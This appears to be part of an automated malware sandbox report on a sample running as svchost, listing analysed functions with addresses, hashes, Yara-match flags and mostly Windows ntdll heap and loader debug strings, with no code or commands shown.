                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                              • API String ID: 0-379654539
                                                                                                                                                                              • Opcode ID: 94693de77df291677fc9bd7b1b761589cc99a9e7a5081fe372ae4765c1d29396
                                                                                                                                                                              • Instruction ID: a2f22c6f3ff2ce5c4933d435fd639cc267a189b984c3696db35e107eb3e5983c
                                                                                                                                                                              • Opcode Fuzzy Hash: 94693de77df291677fc9bd7b1b761589cc99a9e7a5081fe372ae4765c1d29396
                                                                                                                                                                              • Instruction Fuzzy Hash: 12C1787460A386DFDB11CF18C044BAAB7E8BF86704F048D6AF8D58B650E735CA49CB52
                                                                                                                                                                              Function 03040C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 030955AE
                                                                                                                                                                              • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 030954ED
                                                                                                                                                                              • HEAP: , xrefs: 030954E0, 030955A1
                                                                                                                                                                              • HEAP[%wZ]: , xrefs: 030954D1, 03095592
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                                                                                              • API String ID: 0-1657114761
                                                                                                                                                                              • Opcode ID: 34d72509920e828fb7861e436f2630ef902294bfc62da8167ca290b37d0a26f2
                                                                                                                                                                              • Instruction ID: 6e77dae0b0af3c811f4922b0b80cbfbaa275f8a7daa714a7a1d8ee69858aeec5
                                                                                                                                                                              • Opcode Fuzzy Hash: 34d72509920e828fb7861e436f2630ef902294bfc62da8167ca290b37d0a26f2
                                                                                                                                                                              • Instruction Fuzzy Hash: 1DA103B4606305DFDB24DF25C840BBAFBE5BF45300F18C579D5969B682D730AA44CB90
                                                                                                                                                                              Function 0306273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 030A21D9, 030A22B1
                                                                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 030A22B6
                                                                                                                                                                              • .Local, xrefs: 030628D8
                                                                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 030A21DE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                              • API String ID: 0-1239276146
                                                                                                                                                                              • Opcode ID: 400c26ec1483dc1437b12f07c6fc425fee0954a10222e51591fada67e059b59f
                                                                                                                                                                              • Instruction ID: ab00a894ef777e4ed3b4c4a9c1525d0ff4614fe7f52d1f3e91fa28b4657720c8
                                                                                                                                                                              • Opcode Fuzzy Hash: 400c26ec1483dc1437b12f07c6fc425fee0954a10222e51591fada67e059b59f
                                                                                                                                                                              • Instruction Fuzzy Hash: EDA1A435902229DFDB64CF94DC84BA9B3B9BF98314F1949F9D848AB255D7309E80CF90
                                                                                                                                                                              Function 00402A60 Relevance: 5.2, Strings: 4, Instructions: 235COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: gfff$gfff$gfff$gfff
                                                                                                                                                                              • API String ID: 0-2178600047
                                                                                                                                                                              • Opcode ID: f366f24bc9d75067d7207524ec8debeb1928454ca52c5c8ba3b73a7eff58b346
                                                                                                                                                                              • Instruction ID: 32a31745c1b075827efe8c630c426152b3985c7a222054b953e80827120a94c5
                                                                                                                                                                              • Opcode Fuzzy Hash: f366f24bc9d75067d7207524ec8debeb1928454ca52c5c8ba3b73a7eff58b346
                                                                                                                                                                              • Instruction Fuzzy Hash: DD61D771B000094BDB1CCD5EDE996AEB3A6E794305F18817FD90AEF3C0E979AE019785
                                                                                                                                                                              Function 004011E0 Relevance: 5.2, Strings: 4, Instructions: 212COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: *#'$*#'$D{$VUUU
                                                                                                                                                                              • API String ID: 0-1567985193
                                                                                                                                                                              • Opcode ID: c5d4516b63beaceb200c936774b6555e95664564e92dc2147f14dfc0c712ddff
                                                                                                                                                                              • Instruction ID: f71770e8a8a99a49184eae387425b030ee0ba716f621ff4f83f23ae8b8de8afc
                                                                                                                                                                              • Opcode Fuzzy Hash: c5d4516b63beaceb200c936774b6555e95664564e92dc2147f14dfc0c712ddff
                                                                                                                                                                              • Instruction Fuzzy Hash: 1971D370E0060A87DF18CF99D8501EEB771EBD4304F24826FD908AF391EB799A42CB95
                                                                                                                                                                              Function 0302F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                                                                              • API String ID: 0-2586055223
                                                                                                                                                                              • Opcode ID: 51473d4af4ab5a16001a8c66178c9287bc9b5fcb85c662cd83902b6be772d811
                                                                                                                                                                              • Instruction ID: cd169c4b661ddf551d2b8ad62587b4ed936b4eb82799c98fa2cd31418c870384
                                                                                                                                                                              • Opcode Fuzzy Hash: 51473d4af4ab5a16001a8c66178c9287bc9b5fcb85c662cd83902b6be772d811
                                                                                                                                                                              • Instruction Fuzzy Hash: D56126762077419FD721EB24D848F6BBBE8FF80754F0808A8F9958B691D734D941CB61
                                                                                                                                                                              Function 00402A5C Relevance: 5.2, Strings: 4, Instructions: 175COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: gfff$gfff$gfff$gfff
                                                                                                                                                                              • API String ID: 0-2178600047
                                                                                                                                                                              • Opcode ID: 60226f66c4c22a581bce32bc3a714a90297c580af2b3f686437b8a928b9293f2
                                                                                                                                                                              • Instruction ID: d037f57f20901ccb32078fc8257468b11a576417b42d1f243a2f033c3301ab37
                                                                                                                                                                              • Opcode Fuzzy Hash: 60226f66c4c22a581bce32bc3a714a90297c580af2b3f686437b8a928b9293f2
                                                                                                                                                                              • Instruction Fuzzy Hash: CF511371B000094BCF1C8D5EDEA96AE7662A7A0305F18813FD906EF3C1E9B9AE058685
                                                                                                                                                                              Function 030E11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                                                                              • API String ID: 0-336120773
                                                                                                                                                                              • Opcode ID: e7538718cc7c0a95a180c5b0432dd44e1cf8d26612ffd48d45e0bf918396db5c
                                                                                                                                                                              • Instruction ID: f182c76e1fd723074562ca80331057c3fa615ddfa4687c06317b6313be3e3210
                                                                                                                                                                              • Opcode Fuzzy Hash: e7538718cc7c0a95a180c5b0432dd44e1cf8d26612ffd48d45e0bf918396db5c
                                                                                                                                                                              • Instruction Fuzzy Hash: 7B31EB35313210EFD759EB98CC85FAAB7E8EF49620F180459E411CB291EA70EC50CBA5
                                                                                                                                                                              Function 03029148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                                                              • API String ID: 0-1391187441
                                                                                                                                                                              • Opcode ID: bd4311ea88bbdd4f476299d489b0fc39594128a30bcbb6ee06fae9030c50573d
                                                                                                                                                                              • Instruction ID: 5d9398399dc807550d88176a1e5ea75b7c86a0f9ae0dafe8f99a3dd2a340803f
                                                                                                                                                                              • Opcode Fuzzy Hash: bd4311ea88bbdd4f476299d489b0fc39594128a30bcbb6ee06fae9030c50573d
                                                                                                                                                                              • Instruction Fuzzy Hash: F631A336A02214EFDB11EB4ACC85FEEBBF8EF45620F144055E814AB291DB70ED40CB60
                                                                                                                                                                              Function 030429A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • HEAP: , xrefs: 03043264
                                                                                                                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0304327D
                                                                                                                                                                              • HEAP[%wZ]: , xrefs: 03043255
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                                              • API String ID: 0-617086771
                                                                                                                                                                              • Opcode ID: bbace2d7e2799f763e9d1259a6b70b8320673de338e03871a98d1f1176bc903c
                                                                                                                                                                              • Instruction ID: 9ade8c74490526c6ef082959ba289de0eb00d344367e729cba3a91c48250effe
                                                                                                                                                                              • Opcode Fuzzy Hash: bbace2d7e2799f763e9d1259a6b70b8320673de338e03871a98d1f1176bc903c
                                                                                                                                                                              • Instruction Fuzzy Hash: 1F92CEB4A06249DFDB65CF68C4407AEBBF5FF48300F1888A9E855AB391D735AA41CF50
                                                                                                                                                                              Function 03041F92 Relevance: 4.3, Strings: 3, Instructions: 563COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                              • API String ID: 0-3178619729
                                                                                                                                                                              • Opcode ID: cb07d8caae837ed0d22653f17c4e4eb314248db6fbe12b095203b163447a5f08
                                                                                                                                                                              • Instruction ID: 2fafb21f5a73a92fb9dae01c68ada738e3fff0b248f7ce428ab3264011913ff2
                                                                                                                                                                              • Opcode Fuzzy Hash: cb07d8caae837ed0d22653f17c4e4eb314248db6fbe12b095203b163447a5f08
                                                                                                                                                                              • Instruction Fuzzy Hash: 782223706026059FEB25DF29C894B7AFBF9FF46704F18889AE4558F282D732D981CB50
                                                                                                                                                                              Function 03040770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                              • API String ID: 0-4253913091
                                                                                                                                                                              • Opcode ID: e364cd44a9a3cca0c904f8c89ba0a83939755a1f9b1df79511728c041ca3e3c5
                                                                                                                                                                              • Instruction ID: ef05a8aa5f5fb6a5d765c3b384102d51e27fdd00a72e21da8ee8b2a5f6b2261d
                                                                                                                                                                              • Opcode Fuzzy Hash: e364cd44a9a3cca0c904f8c89ba0a83939755a1f9b1df79511728c041ca3e3c5
                                                                                                                                                                              • Instruction Fuzzy Hash: 9CF1CE74A02605DFEB15CF69C980B6AF7F5FF46300F1845A9E516AB381D734EA81CB90
                                                                                                                                                                              Function 03031460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03031728
                                                                                                                                                                              • HEAP: , xrefs: 03031596
                                                                                                                                                                              • HEAP[%wZ]: , xrefs: 03031712
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                              • API String ID: 0-3178619729
                                                                                                                                                                              • Opcode ID: 5131155a6135c34cdd24f37fda2845503ccacd8f171d3b03587a278af397737d
                                                                                                                                                                              • Instruction ID: 71b6bb790aaa30dcc7d52970d434b701228935d94464fe1b6e4033aac520d5a2
                                                                                                                                                                              • Opcode Fuzzy Hash: 5131155a6135c34cdd24f37fda2845503ccacd8f171d3b03587a278af397737d
                                                                                                                                                                              • Instruction Fuzzy Hash: C6E10470A066429FDB29EF68C451BBABBF9EF4A300F18895DE4D6CB245D734E940CB50
                                                                                                                                                                              Function 0303B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                                                                                              • API String ID: 0-1145731471
                                                                                                                                                                              • Opcode ID: 8366b02348dd6a29856b650d90c0602db5a3ec8021b021f037a63e81bbbc6d88
                                                                                                                                                                              • Instruction ID: 465d57bba662846ee1cb203a5b25128771fa4bcf7f453c11f62f34a18a094264
                                                                                                                                                                              • Opcode Fuzzy Hash: 8366b02348dd6a29856b650d90c0602db5a3ec8021b021f037a63e81bbbc6d88
                                                                                                                                                                              • Instruction Fuzzy Hash: 78B16D79A067059BDF25CF59C980BAEB7F9EF85714F1849AAE451EB380D730A840CF50
                                                                                                                                                                              Function 030B368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                                                                              • API String ID: 0-2391371766
                                                                                                                                                                              • Opcode ID: d2956a38193c1cd2926531c75e9be4b56c658974ac2756b919126438da855a10
                                                                                                                                                                              • Instruction ID: 8cef4213393852eae9d25d298a7328a7d5257a04b391688bc9a41197461d1e8b
                                                                                                                                                                              • Opcode Fuzzy Hash: d2956a38193c1cd2926531c75e9be4b56c658974ac2756b919126438da855a10
                                                                                                                                                                              • Instruction Fuzzy Hash: 2AB1C179606345EFD321DF54C880FABB7F8EB48710F250969FA409B280D771E854CB96
                                                                                                                                                                              Function 03056962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $@
                                                                                                                                                                              • API String ID: 0-1077428164
                                                                                                                                                                              • Opcode ID: 48fd9660909fcbafe0606ae504e2909855541e6877aa12d13cb89393a70ebedd
                                                                                                                                                                              • Instruction ID: db0067a8d81a0dff0e710dab4098109e1e964348cdff9e51a3d0d5ef40f3ccd4
                                                                                                                                                                              • Opcode Fuzzy Hash: 48fd9660909fcbafe0606ae504e2909855541e6877aa12d13cb89393a70ebedd
                                                                                                                                                                              • Instruction Fuzzy Hash: 97C27F71A0A3459FEB65CF24C880BABBBE5AFC8744F08896DF989C7240D735D805DB52
                                                                                                                                                                              Function 0302A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                              • API String ID: 0-2779062949
                                                                                                                                                                              • Opcode ID: 02a5fae36c0771ef38fd5c9c9de05dc94cd77815fa49e0b67b231cc83cc7291f
                                                                                                                                                                              • Instruction ID: bec9bb0cfd0ac1fe04addd07afa57f14c8aaa75e255bf0ac01f5ae889c261cc7
                                                                                                                                                                              • Opcode Fuzzy Hash: 02a5fae36c0771ef38fd5c9c9de05dc94cd77815fa49e0b67b231cc83cc7291f
                                                                                                                                                                              • Instruction Fuzzy Hash: 24A16F759026299BDB31EF24CC88BEAF7B8EF44700F1401E9E909A7250D7359E85CF64
                                                                                                                                                                              Function 0306909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: %$&$@
                                                                                                                                                                              • API String ID: 0-1537733988
                                                                                                                                                                              • Opcode ID: 6276131d5a07e781d6ed01bea05f4ebec9f53f3c268eee2c66bc83a84c1e6359
                                                                                                                                                                              • Instruction ID: 4d808fe54aa5d3d70425abf4bdfd21c8b46c61fa333f6e82de8584aeec73bce7
                                                                                                                                                                              • Opcode Fuzzy Hash: 6276131d5a07e781d6ed01bea05f4ebec9f53f3c268eee2c66bc83a84c1e6359
                                                                                                                                                                              • Instruction Fuzzy Hash: EB71D17060A7029FC754DF24C980A6FFBE9BFC5718F14891DE4968BA48C731D805CB52
                                                                                                                                                                              Function 0310B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0310B82A
                                                                                                                                                                              • GlobalizationUserSettings, xrefs: 0310B834
                                                                                                                                                                              • TargetNtPath, xrefs: 0310B82F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                                                                              • API String ID: 0-505981995
                                                                                                                                                                              • Opcode ID: 51b98678d81d828f8cfc7390ec0c1270656d1c6ba3392c6f57219685ca39ee6b
                                                                                                                                                                              • Instruction ID: 8d2534f42267dc4ff75920471cb4fddea215a78fae243a8175daf28160760d33
                                                                                                                                                                              • Opcode Fuzzy Hash: 51b98678d81d828f8cfc7390ec0c1270656d1c6ba3392c6f57219685ca39ee6b
                                                                                                                                                                              • Instruction Fuzzy Hash: 31618076D45229AFDB31DF55CC88BDAB7B8AF48714F0141E5A908AB290C774DE80CF90
                                                                                                                                                                              Function 0302F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0308E6C6
                                                                                                                                                                              • HEAP: , xrefs: 0308E6B3
                                                                                                                                                                              • HEAP[%wZ]: , xrefs: 0308E6A6
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                                                              • API String ID: 0-1340214556
                                                                                                                                                                              • Opcode ID: ad78025c3d509e971d11b987610945a517328c92befa2a9917633ceb226f9f61
                                                                                                                                                                              • Instruction ID: 831b438e11e139893b02a6ef48b8e29e26f30d52751b9167f91c80a4caf2c5de
                                                                                                                                                                              • Opcode Fuzzy Hash: ad78025c3d509e971d11b987610945a517328c92befa2a9917633ceb226f9f61
                                                                                                                                                                              • Instruction Fuzzy Hash: D0510575606755EFE712EBA8C844BAAFBF8FF45340F0804A4E9818B692D774E950CB10
                                                                                                                                                                              Function 030DDAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • Heap block at %p modified at %p past requested size of %Ix, xrefs: 030DDC32
                                                                                                                                                                              • HEAP: , xrefs: 030DDC1F
                                                                                                                                                                              • HEAP[%wZ]: , xrefs: 030DDC12
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                                                                              • API String ID: 0-3815128232
                                                                                                                                                                              • Opcode ID: 9b99985b5a885345d76920e159ab1f67f85e9b5bf26bea70ee03f43bfc269ad3
                                                                                                                                                                              • Instruction ID: d336e93cb1fbb7532b48e61f8e6989b342ee8ccb017cbdf5e861736498da7cb1
                                                                                                                                                                              • Opcode Fuzzy Hash: 9b99985b5a885345d76920e159ab1f67f85e9b5bf26bea70ee03f43bfc269ad3
                                                                                                                                                                              • Instruction Fuzzy Hash: CC514635102350CEE7B4DB2EC844776B7E6DF46368F088C8AE4D28F685D676E842DB20
                                                                                                                                                                              Function 0306C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 030A82E8
                                                                                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 030A82D7
                                                                                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 030A82DE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                              • API String ID: 0-1783798831
                                                                                                                                                                              • Opcode ID: 3a719491c2993c8fec86ab53af88c34d7dd4e4267b9943587b8fb5325507dd3b
                                                                                                                                                                              • Instruction ID: ca8948d27a81a57ade1fcc46248d9c1ec8893e99653b8597da5a269210cdda87
                                                                                                                                                                              • Opcode Fuzzy Hash: 3a719491c2993c8fec86ab53af88c34d7dd4e4267b9943587b8fb5325507dd3b
                                                                                                                                                                              • Instruction Fuzzy Hash: A141E7B5506304ABD724FB68D844B9B77E8EF88750F04492AF998DB294E770D860CBA1
